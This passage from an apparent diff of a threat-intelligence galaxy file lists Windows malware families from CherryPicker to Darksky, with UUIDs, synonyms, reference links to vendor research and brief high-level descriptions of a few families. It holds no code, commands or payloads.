"https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" + ] + }, + "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", + "value": "CherryPicker POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", + "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" + ] + }, + "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", + "value": "ChewBacca", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" + ] + }, + "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", + "value": "Chinad", + "description": "Adware that shows 
advertisements using plugin techniques for popular browsers" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" + ] + }, + "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", + "value": "Chir", + "description": "" + }, + { + "meta": { + "synonyms": [ + "AndroKINS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.s21sec.com/en/blog/2017/07/androkins/", + "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" + ] + }, + "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", + "value": "Chthonic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", + "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", + "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", + "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", + "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" + ] + }, + "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", + "value": "Citadel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", + "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" + ] + }, + "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", + "value": "Client Maximus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", + "https://www.f-secure.com/weblog/archives/00002822.html" + ] + }, + "uuid": 
"40baac36-2fd0-49b3-b05b-1087d60f4f2c", + "value": "Cloud Duke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" + ] + }, + "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", + "value": "CMSBrute", + "description": "" + }, + { + "meta": { + "synonyms": [ + "meciv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", + "https://twitter.com/ClearskySec/status/963829930776723461", + "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" + ] + }, + "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", + "value": "CMSTAR", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" + ] + }, + "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", + "value": "Cobalt Strike", + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. 
Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", + "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", + "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" + ] + }, + "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", + "value": "Cobian RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "COOLPANTS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", + "https://www.group-ib.com/blog/renaissance", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" + ] + }, + "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", + "value": "CobInt", + "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." 
+ }, + { + "meta": { + "synonyms": [ + "Carbon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", + "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", + "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/hfiref0x/TDL" + ] + }, + "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", + "value": "Cobra Carbon System", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", + "https://twitter.com/JaromirHorejsi/status/817311664391524352" + ] + }, + "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", + "value": "CockBlocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" + ] + }, + "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", + "value": "CodeKey", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", + "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" + ] + }, + "uuid": "9481d7b1-307c-4504-9333-21720b85317b", + "value": "Cohhoc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", + "https://secrary.com/ReversingMalware/CoinMiner/", + "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" + ] + }, + "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", + 
"value": "Coinminer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bandios", + "GrayBird" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", + "https://twitter.com/anyrun_app/status/976385355384590337", + "https://secrary.com/ReversingMalware/Colony_Bandios/", + "https://pastebin.com/GtjBXDmz" + ] + }, + "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", + "value": "Colony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" + ] + }, + "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", + "value": "Combojack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", + "value": "Combos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", + "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" + ] + }, + "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", + "value": "ComodoSec", + "description": "" + }, + { + "meta": { + "synonyms": [ + "lojack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", + "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", + "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", + "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research", + "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/" + ] + }, + "uuid": 
"d24882f9-8645-4f6a-8a86-2f85daaad685", + "value": "Computrace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", + "https://twitter.com/struppigel/status/816926371867926528" + ] + }, + "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", + "value": "ComradeCircle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", + "value": "concealment_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "downadup", + "traffic converter" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", + "http://contagiodump.blogspot.com/2009/05/win32conficker.html" + ] + }, + "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", + "value": "Conficker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" + ] + }, + "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", + "value": "Confucius", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", + "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" + ] + }, + "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", + "value": "Contopee", + "description": "" + }, + { + 
"meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", + "value": "CookieBag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", + "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", + "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" + ] + }, + "uuid": "495377c4-1be5-4c65-ba66-94c221061415", + "value": "Corebot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://malware.prevenity.com/2014/08/malware-info.html", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" + ] + }, + "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", + "value": "Coreshell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", + "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" + ] + }, + "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", + "value": "CradleCore", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crash", + "Industroyer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", + 
"https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ] + }, + "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", + "value": "CrashOverride", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", + "value": "Credraptor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" + ] + }, + "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", + "value": "Crenufs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" + ] + }, + "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", + "value": "Crimson", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" 
+ ] + }, + "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "value": "Crisis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", + "https://hackmag.com/security/ransomware-russian-style/", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", + "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", + "https://twitter.com/demonslay335/status/971164798376468481" + ] + }, + "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", + "value": "Cryakl", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" + ] + }, + "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", + "value": "CryLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", + "value": "CrypMic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", + "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" + ] + }, + "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", + "value": "Crypt0l0cker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", + "https://www.secureworks.com/research/cryptolocker-ransomware", + 
"https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware" + ] + }, + "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", + "value": "CryptoLocker", + "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", + "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" + ] + }, + "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", + "value": "CryptoLuck", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptFile2" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", + "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", + "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" + ] + }, + "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", + "value": "CryptoMix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", + "https://twitter.com/struppigel/status/810770490491043840" + ] + }, + "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", + "value": "Cryptorium", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", + "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", + 
"http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" + ] + }, + "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", + "value": "CryptoShield", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", + "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" + ] + }, + "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", + "value": "CryptoShuffler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" + ] + }, + "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", + "value": "Cryptowall", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", + "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" + ] + }, + "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", + "value": "CryptoWire", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", + "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", + "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", + "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" + ] + }, + "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", + "value": "CryptoFortress", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", + "https://twitter.com/JaromirHorejsi/status/818369717371027456" + ] + }, + "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", + "value": "CryptoRansomeware", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", + "value": "CryptXXXX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", + "value": "CsExt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Windshield?" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", + "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451" + ] + }, + "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", + "value": "Cuegoe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", + "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" + ] + }, + "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", + "value": "Cueisfry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", + "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" + ] + }, + "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", + "value": "Cutlet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" + ] + }, + "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", + "value": "Cutwail", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Rebhip" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ] + }, + "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", + "value": "CyberGate", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" + ] + }, + "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", + "value": "CyberSplitter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", + "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" + ] + }, + "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", + "value": "CycBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", + "value": "Dairy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", + "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + 
"https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" + ] + }, + "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", + "value": "DanaBot", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. " + }, + { + "meta": { + "synonyms": [ + "Fynloski", + "klovbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", + "https://darkcomet.net", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", + "value": "DarkComet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", + "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html", + "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html" + ] + }, + "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", + "value": "DarkMegi", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chymine" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", + "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", + 
"http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", + "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml" + ] + }, + "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", + "value": "Darkmoon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" + ] + }, + "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", + "value": "DarkPulsar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", + "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" + ] + }, + "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", + "value": "DarkShell", + "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", + "https://blog.radware.com/security/2018/02/darksky-botnet/", + "http://telegra.ph/Analiz-botneta-DarkSky-12-30", + "https://github.com/ims0rry/DarkSky-botnet" + ] + }, + "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", + "value": "Darksky", + "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. 
